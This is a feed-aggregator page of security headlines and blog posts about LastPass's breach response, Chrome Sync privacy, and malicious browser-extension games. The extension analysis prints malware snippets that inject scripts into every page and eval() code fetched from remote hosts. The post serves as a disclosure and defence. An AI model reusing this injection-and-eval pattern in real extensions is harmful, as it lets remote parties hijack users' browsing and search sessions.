feeds
by zer0x0ne — on

xkcd
Retrieved title: xkcd.com, 3 item(s)Urban Planning Opinion Progression
xkcd Phone Flip
Haunted House
PortSwigger Research
Retrieved title: PortSwigger Research, 6 item(s)Smashing the state machine: the true potential of web race conditions
For too long, web race condition attacks have focused on a tiny handful of scenarios. Their true potential has been masked thanks to tricky workflows, missing tooling, and simple network jitter hiding
Exploiting XSS in hidden inputs and meta tags
In this post we are going to show how you can (ab)use the new HTML popup functionality in Chrome to exploit XSS in meta tags and hidden inputs. It all started when I noticed the new popover behaviour
How I choose a security research topic
How do you choose what topic to research? That’s the single most common question I get asked, probably because selecting a topic is such a daunting prospect. In this post, I’ll take a personal look at
Bypassing CSP via DOM clobbering
You might have found HTML injection, but unfortunately identified that the site is protected with CSP. All is not lost, it might be possible to bypass CSP using DOM clobbering, which you can now detec
Ambushed by AngularJS: a hidden CSP bypass in Piwik PRO
Any individual website component can undermine the security of the entire site, and analytics platforms are no exception. With this in mind, we decided to do a quick audit of Piwik PRO to make sure it
The curl quirk that exposed Burp Suite & Google Chrome
In this post, we'll explore a little-known feature in curl that led to a local-file disclosure vulnerability in both Burp Suite Pro, and Google Chrome. We patched Burp Suite a while back, but suspect
Dark Reading
Retrieved title: Dark Reading, 6 item(s)When It Comes to Email Security, The Cloud You Pick Matters
While cloud-based email offers more security than on-premises, insurance firms say it matters whether you use Microsoft 365 or Google Workspace.
Xenomorph Android Malware Targets Customers of 30 US Banks
The Trojan had mainly been infecting banks in Europe since it first surfaced more than one year ago.
MOVEit Flaw Leads to 900 University Data Breaches
National Student Clearinghouse, a nonprofit serving thousands of universities with enrollment services, exposes more than 900 schools within its MOVEit environment.
UAE-Linked 'Stealth Falcon' APT Mimics Microsoft in Homoglyph Attack
The cyberattackers are using the "Deadglyph" custom spyware, whose full capabilities have not yet been uncovered.
The Hot Seat: CISO Accountability in a New Era of SEC Regulation
Updated cybersecurity regulations herald a new era of transparency and accountability in the face of escalating industry vulnerabilities.
Cyber Hygiene: A First Line of Defense Against Evolving Cyberattacks
Back to basics is a good start, but too often security teams don't handle their deployment correctly. Here's how to avoid the common pitfalls.
Almost Secure
Retrieved title: Almost Secure, 3 item(s)A year after the disastrous breach, LastPass has not improved
In September last year, a breach at LastPass’ parent company GoTo (formerly LogMeIn) culminated in attackers siphoning out all data from their servers. The criticism from the security community has been massive. This was not so much because of the breach itself, such things happen, but because of the many obvious ways in which LastPass made matters worse: taking months to notify users, failing to provide useful mitigation instructions, downplaying the severity of the attack, ignoring technical issues which have been publicized years ago and made the attackers’ job much easier. The list goes on.
Now this has been almost a year ago. LastPass promised to improve, both as far as their communication goes and on the technical side of things. So let’s take a look at whether they managed to deliver.
TL;DR: They didn’t. So far I failed to find evidence of any improvements whatsoever.

Contents
The communication
The initial advisory
LastPass’ initial communication around the breach has been nothing short of a disaster. It happened more than three months after the users’ data was extracted from LastPass servers. Yet rather than taking responsibility and helping affected users, their PR statement was designed to downplay and to shift blame. For example, it talked a lot about LastPass’ secure default settings but failed to mention that LastPass never really enforced those. In fact, people who created their accounts a while ago and used very outdated (insecure) settings never saw as much as a warning.
The statement concluded with “There are no recommended actions that you need to take at this time.” I called this phrase “gross negligence” back when I initially wrote about it, and I still stand by this assessment.
The detailed advisory
It took LastPass another two months of strict radio silence to publish a more detailed advisory. That’s where we finally learned some more about the breach. We also learned that business customers using Federated Login are very much affected by the breach, the previous advisory explicitly denied that.
But even now, we learn that indirectly, in recommendation 9 out of 10 for LastPass’ business customers. It seems that LastPass considered generic stuff like advice on protecting against phishing attacks more important than mitigation of their breach. And then the recommendation didn’t actually say “You are in danger. Rotate K2 ASAP.” Instead, it said “If, based on your security posture or risk tolerance, you decide to rotate the K1 and K2 split knowledge components…” That’s the conclusion of a large pile of text essentially claiming that there is no risk.
At least the advisory for individual users got the priorities right. It was master password first, iterations count after that, and all the generic advice at the end.
Except: they still failed to admit the scope of the breach. The advice was:
Depending on the length and complexity of your master password and iteration count setting, you may want to reset your master password.
And this is just wrong. The breach already happened. Resetting the master password will help protect against future breaches, but it won’t help with the passwords already compromised. This advice should have really been:
Depending on the length and complexity of your master password and iteration count setting, you may want to reset all your passwords.
But this would amount to saying “we screwed up big time.” Which they definitely did. But they still wouldn’t admit it.
Improvements?
A blog post by the LastPass CEO Karin Toubba said:
I acknowledge our customers’ frustration with our inability to communicate more immediately, more clearly, and more comprehensively throughout this event. I accept the criticism and take full responsibility. We have learned a great deal and are committed to communicating more effectively going forward.
As I’ve outlined above, the detailed advisory published simultaneously with this blog post still left a lot to be desired. But this sounds like a commitment to improve. So maybe some better advice has been published in the six months which passed since then?
No, this doesn’t appear to be the case. Instead, the detailed advisory moved to the “Get Started – About LastPass” section of their support page. So it’s now considered generic advice for LastPass users. Any specific advice on mitigating the fallout of the breach, assuming that it isn’t too late already? There doesn’t seem to be any.
The LastPass blog has been publishing lots of articles again, often multiple per week. There doesn’t appear to be any useful information at all here however, only PR. To add insult to injury, LastPass published an article in July titled “How Zero Knowledge Keeps Passwords Safe.” It gives a generic overview of zero knowledge which largely doesn’t apply to LastPass. It concludes with:
For example, zero-knowledge means that no one has access to your master password for LastPass or the data stored in your LastPass vault, except you (not even LastPass).
This is bullshit. That’s not how LastPass has been designed, and I wrote about it five years ago. Other people did as well. LastPass didn’t care, otherwise this breach wouldn’t have been such a disaster.
Secure settings
The issue
LastPass likes to boast how their default settings are perfectly secure. But even assuming that this is true, what about the people who do not use their defaults? For example the people who created their LastPass account a long time ago, back when the defaults were different?
The iterations count is particularly important. Few people have heard about it, it being hidden under “Advanced Settings.” Yet when someone tries to decrypt your passwords, this value is an extremely important factor. A high value makes successful decryption much less likely.
As of 2023, the current default value is 600,000 iterations. Before the breach the default used to be 100,100 iterations, making decryption of passwords six times faster. And before 2018 it was 5,000 iterations. Before 2013 it was 500. And before 2012 the default was 1 iteration.
What happened to all the accounts which were created with the old defaults? It appears that for most of these LastPass failed to fix the settings automatically. People didn’t even receive a warning. So when the breach happened, quite a few users reported having their account configured with 1 iteration, massively weakening the protection provided by the encryption.
It’s the same with the master password. In 2018 LastPass introduced much stricter master password rules, requiring at least 12 characters. While I don’t consider length-based criteria very effective to guide users towards secure passwords, LastPass failed to enforce even this rule for existing accounts. Quite a few people first learned about the new password complexity requirement when reading about the breach.
Improvements?
I originally asked LastPass about enforcing a secure iterations count setting for existing accounts in February 2018. LastPass kept stalling until I published my research without making certain that all users are secure. And they ignored this issue another four years until the breach happened.
And while the breach prompted LastPass to increase the default iterations count, they appear to be still ignoring existing accounts. I just logged into my test account and checked the settings:

There is no warning whatsoever. Only if I try to change this setting, a message pops up:
For your security, your master password iteration value must meet the LastPass minimum requirement: 600000
But people who are unaware of this setting will not be warned. And while LastPass definitely could update this setting automatically when people log in, they still choose not to do it for some reason.
It’s the same with the master password. The password of my test account is weak because this account has been created years ago. If I try to change it, I will be forced to choose a password that is at least 12 characters long. But as long as I just keep using the same password, LastPass won’t force me to change it – even though it definitely could.
There isn’t even a definitive warning when I log in. There is only this notification in the menu:

Only after clicking “Security Dashboard” will a warning message show up:

If this is such a critical issue that I need to change my master password immediately, why won’t LastPass just tell me to do it when I log in?
This alert message apparently pre-dates the breach, so there don’t seem to be any improvements in this area either.
Unencrypted data
The issue
LastPass PR likes to use “secure vault” as a description of LastPass data storage. This implies that all data is secured (encrypted) and cannot be retrieved without the knowledge of the master password. But that’s not the case with LastPass.
LastPass encrypts passwords, user names and a few other pieces of data. Everything else is unencrypted, in particular website addresses and metadata. That’s a very bad idea, as security researchers kept pointing out again and again. In November 2015 (page 67). In January 2017. In July 2018. And there are probably more.
LastPass kept ignoring this issue. So when last year their data leaked, the attackers gained not only encrypted passwords but also plenty of plaintext data. Which LastPass was forced to admit but once again downplayed by claiming website addresses not to be sensitive data. And users were rightfully outraged.
Improvements?
Today I logged into my LastPass account and then opened https://lastpass.com/getaccts.php
. This gives you the XML representation of your LastPass data as it is stored on the server. And I fail to see any improvements compared to this data one year ago. I gave LastPass the benefit of the doubt and created a new account record. Still:
<account url="68747470733a2f2f746573742e6465" last_modified="1693940903" …>
The data in the url
field is merely hex-encoded which can be easily translated back into https://test.de
. And the last_modified
field is a Unix timestamp, no encryption here either.
Conclusions
A year after the breach, LastPass still hasn’t provided their customers with useful instructions on mitigating the breach, nor has it admitted the full scope of the breach. They also failed to address any of the long-standing issues that security researchers have been warning about for years. At the time of writing, owners of older LastPass accounts still have to become active on their own in order to fix outdated security settings. And much of LastPass data isn’t being encrypted.
I honestly cannot explain LastPass’ denial to fix security settings of existing accounts. Back when I was nagging them about it, they straight out lied to me. Don’t they have any senior engineers on staff, so that nobody can implement this change? Do they really not care as long as they can blame the users for not updating their settings? Beats me.
As to not encrypting all the data, I am starting to suspect that LastPass actually wants visibility into your data. Do they need to know which websites you have accounts on in order to guide some business decisions? Or are they making additional income by selling this data? I don’t know, but LastPass persistently ignoring this issue makes me suspicious.
Either way, it seems that LastPass considers the matter of their breach closed. They published their advisory in March this year, and that’s it. Supposedly, they improved the security of their infrastructure, which nobody can verify of course. There is nothing else coming, no more communication and no technical improvements. Now they will only be publishing more lies about “zero knowledge architecture.”
Chrome Sync privacy is still very bad
Five years ago I wrote an article about the shortcomings of Chrome Sync (as well as a minor issue with Firefox Sync). Now Chrome Sync has seen many improvements since then. So time seems right for me to revisit it and to see whether it respects your privacy now.
Spoiler: No, it doesn’t. It improved, but that’s an improvement from outright horrible to merely very bad. The good news: today you can use Chrome Sync in a way that preserves your privacy. Google however isn’t interested in helping you figure out how to do it.
Contents
The default flow
Chrome Sync isn’t some obscure feature of Google Chrome. In fact, as of Chrome 116 setting up sync is part of the suggested setup when you first install the browser:

Clicking “Continue” will ask you to log into your Google account after which you are suggested to turn on sync:

Did you click the suggested “Yes, I’m in” button here? Then you’ve already lost. You just allowed Chrome to upload your data to Google servers, without any encryption. Your passwords, browsing history, bookmarks, open tabs? They are no longer yours only, you allowed Google to access them. Didn’t you notice the “Google may personalize Search and other services based on your history” text in the prompt?
In case you have any doubts, this setting (which is off by default) gets turned on when you click “Yes, I’m in”:

Yes, Google is definitely watching over your shoulder now.
The privacy-preserving flow
Now there is a way for you to use Chrome Sync and keep your privacy. In the prompt above, you should have clicked “Settings.” Which would have given you this page:

Do you see what you need to do here before confirming? Anyone? Right, “Make searches and browsing better” option has already been turned on and needs to be switched off. But that isn’t the main issue.
“Encryption options” is what you need to look into. Don’t trust the claim that Chrome is encrypting your data, expand this section.

That default option sounds sorta nice, right? What it means however is: “Whatever encryption there might be, we get to see your data whenever we want it. But you trust us not to peek, right?” The correct answer is “No” by the way, as Google is certain to monetize your browsing history at the very least. And even if you trust Google to do no evil, do you also trust your government? Because often enough Google will hand over your data to local authorities.
The right way to use Chrome Sync is to set up a passphrase here. This will make sure that most of your data is safely encrypted (payment data being a notable exception), so that neither Google nor anyone else with access to Google servers can read it.
What does Google do with your data?
Deep in Chrome’s privacy policy is a section called How Chrome handles your synced information. That’s where you get some hints towards how your data is being used. In particular:
If you don’t use your Chrome data to personalize your Google experience outside of Chrome, Google will only use your Chrome data after it’s anonymized and aggregated with data from other users.
So Google will use the data for personalization. But even if you opt out of this personalization, they will still use your “anonymized and aggregated” data. As seen before, promises to anonymize and aggregate data cannot necessarily be trusted. Even if Google is serious about this, proper anonymization is difficult to achieve.
So how do you make sure that Google doesn’t use your data at all?
If you would like to use Google’s cloud to store and sync your Chrome data but you don’t want Google to access the data, you can encrypt your synced Chrome data with your own sync passphrase.
Yes, sync passphrase it is. This phrase is the closest thing I could find towards endorsing sync passphrases, hidden in a document that almost nobody reads.
This makes perfect sense of course. Google has no interest in helping you protect your data. They rather want you to share your data with them, so that Google can profit off it.
It could have been worse
Yes, it could have been worse. In fact, it was worse.
Chrome Sync used to enable immediately when you signed into Chrome, without any further action from you. It also used to upload your data unencrypted before you had a chance to change the settings. Besides, the sync passphrase would only result in passwords being encrypted and none of the other data. And there used to be a warning scaring people away from setting a sync passphrase because it wouldn’t allow Google to display your passwords online. And the encryption was horribly misimplemented.
If you look at it this way, there have been considerable improvements to Chrome Sync over the past five years. But it still isn’t resembling a service meant to respect users’ privacy. That’s by design of course: Google really doesn’t want you to use effective protection for your data. That data is their profits.
Comparison to Firefox Sync
I suspect that people skimming my previous article on the topic took away from it something like “both Chrome Sync and Firefox Sync have issues, but Chrome fixed theirs.” Nothing could be further from the truth.
While Chrome did improve, they are still nowhere close to where Firefox Sync started off. Thing is: Firefox Sync was built with privacy in mind. It was encrypting all data from the very start, by default. Mozilla’s goal was never monetizing this data.
Google on the other hand built a sync service that allowed them to collect all of users’ data, with a tiny encryption shim on top of it. Outside pressure seems to have forced them to make Chrome Sync encryption actually usable. But they really don’t want you to use this, and their user interface design makes that very clear.
Given that, the Firefox Sync issue I pointed out is comparably minor. It isn’t great that five years weren’t enough to address it. This isn’t a reason to discourage people from using Firefox Sync however.
Why browser extension games need access to all websites
When installing browser extensions in Google Chrome, you are asked to confirm the extension’s permissions. In theory, this is supposed to allow assessing the risk associated with an extension. In reality however, users typically lack the knowledge to properly interpret this prompt. For example, I’ve often seen users accusing extension developers of spying just because the prompt says they could.

On the other hand, people will often accept these cryptic prompts without thinking twice. They expect the browser vendors to keep them out of harm’s way, trust that isn’t always justified [1] [2] [3]. The most extreme scenario here is casual games not interacting with the web at all, yet requesting access to all websites. I found a number of extensions that will abuse this power to hijack websites.
Contents
The affected extensions
The extensions listed below belong to three independent groups. Each group is indicated in the “Issue” column and explained in more detail in a dedicated section below.
As the extension IDs are getting too many, I created a repository where I list the IDs from all articles in this series. There is also a check-extensions utility available for download that will search local browser profiles for these extensions.
Extensions in Chrome Web Store:
Name | Weekly active users | Extension ID | Issue |
---|---|---|---|
2048 Classic Game | 486,569 | kgfeiebnfmmfpomhochmlfmdmjmfedfj | False pretenses |
Tetris Classic | 461,812 | pmlcjncilaaaemknfefmegedhcgelmee | False pretenses |
Doodle Jump original | 431,236 | ohdgnoepeabcfdkboidmaedenahioohf | Search hijacking |
Doodle Jump Classic Game | 274,688 | dnbipceilikdgjmeiagblfckeialaela | False pretenses |
Slope Unblocked Game | 99,949 | aciipkgmbljbcokcnhjbjdhilpngemnj | Search hijacking |
Drift Hunters Unblocked Game | 77,812 | nlmjpeojbncdmlfkpppngdnolhfgiehn | Search hijacking |
Vex 4 Unblocked game | 63,164 | phjhbkdgnjaokligmkimgnlagccanodn | Search hijacking |
Crossy Road Game unblocked | 9,511 | fkhpfgpmejefmjaeelgoopkcglgafedm | Search hijacking |
Run 3 Unblocked | 7,299 | mcmmiinopedfbaoongoclagidncaacbd | Search hijacking |
Extensions in Edge Add-ons store:
Name | Weekly active users | Extension ID | Issue |
---|---|---|---|
Slope Unblocked Game | 6,038 | ndcokkmfmiaecmndbpohaogmpmchfpkk | Code injection |
Drift Hunters Unblocked | 3,107 | cpmpjapeeidaikiiemnddfgfdfjjhgif | Code injection |
Tetris Classic | 2,052 | ajefbooiifdkmgkpjkanmgbjbndfbfhg | False pretenses |
False pretenses
Last week, I’ve written about a cluster of browser extensions that would systematically request excessive permissions, typically paired with attempts to make it look like these permissions are actually required. This article already lists several casual games among other extensions.
This isn’t the only large cluster in Chrome Web Store however, there is at least one more. The 34 malicious extensions Google removed recently belonged to this cluster. I’m counting at least 50 more extension in this cluster without obvious malicious functionality, including three casual games.
The extension “2048 Classic Game” and similar ones request access to all websites. They use this access to run a content script on all websites, with code like this:
let {quickAccess} = await chrome.storage.local.get("quickAccess");
if (quickAccess)
displayButton();
function displayButton()
{
document.addEventListener("DOMContentLoaded", async () => {
if (!document.getElementById(`${ chrome.runtime.id }-img`))
{
document.body.insertAdjacentHTML("beforebegin", "…");
document.getElementById(`${ chrome.runtime.id }-btn`)
.addEventListener("click", () =>
{
chrome.runtime.sendMessage({ action: "viewPopup" });
});
}
});
}
Yes, there is a race condition here: what if storage.local.get()
call is slow and finishes after DOMContentLoaded
event already fires? Also: yes, adding some HTML code to the beginning of every page is going to cause a massive mess. None of this is really a problem however as this code isn’t actually meant to run. See, the quickAccess
flag in storage.local
is never being set. It cannot, these extensions don’t have a preferences page.
So this entire content script serves only as a pretense, making it look like the requested permissions are required when they are really not. At some point in the future these extensions are meant to be updated into malicious versions which will abuse these permissions.
Search hijacking
The “Vex 4 Unblocked game” and similar extensions actually contain their malicious code already. They also inject a content script into all web pages. First that content script makes sure to download “options” data from https://cloudenginesdk.com/api/v2/
. It then injects a script from the extension into the page:
let script = document.createElement("script");
script.setAttribute("data-options", data);
script.setAttribute("src", chrome.runtime.getURL("js/options.js"));
script.onload = () => {
document.documentElement.removeChild(script);
};
document.documentElement.appendChild(script);
What does the “options” data returned by cloudenginesdk[.]com look like? The usual response looks like this:
{
"check":"sdk",
"selector":".game-area",
"mask":"cloudenginesdk.com",
"g":"game",
"b":"beta",
"debug":""
}
Given the code in js/options.js
, this data makes no sense. The mask
field specifies which websites the code should run on. This code clearly isn’t meant to run on cloudenginesdk.com
, a website without any pages. So this is a decoy, the server will serve the actual malicious instructions at some point in the future.
Without having seen the instructions, it’s still obvious that the code processing them is meant to run on search pages. The processing for Google search pages booby-traps search results: when a result link is clicked, this script will open a pop-up, sending you to some page receiving your search query as parameter.
For Yahoo pages, this script will download some additional data containing some selectors. Your clicks to one element are then redirected to another element. Presumably, the goal is making you click on ads (ad fraud).
That’s only the obvious part of the functionality however. In addition to that, this code will also inject additional scripts into web pages, presumably showing ads. It will send your search queries to some third party. And it has the capability of running arbitrary JavaScript on any web page.
So while this seems to be geared towards showing you additional search ads, the same functionality could hijack your online banking session for example.
Code injection
The malicious games in Microsoft’s Edge Add-ons store have slight similarities to the ones doing search hijacking. I cannot be certain that they are being published by the same actor however, their functionality is far less sophisticated. The content script simply injects a “browser polyfill” script:
chrome.storage.local.get("polyfill", ({polyfill}) => {
document.documentElement.setAttribute("data-polyfill", polyfill);
let elem = document.createElement("script");
elem.src = chrome.runtime.getURL("js/browser-polyfill.js");
elem.onload = () => {
document.documentElement.removeChild(elem)
};
document.documentElement.appendChild(elem);
});
And what does that “polyfill” script do? It runs the “polyfill” code:
const job = document.documentElement.getAttribute("data-polyfill");
document.documentElement.removeAttribute("data-polyfill");
job && eval(job);
So where does this “polyfill” code come from? The extension downloads it from https://polyfilljs.org/browser-polyfill
.
For me, this download produces only an empty object. Presumably, it will only give out the malicious script to people who have been using the extension for a while. And that script will be injected into each and every website visited then.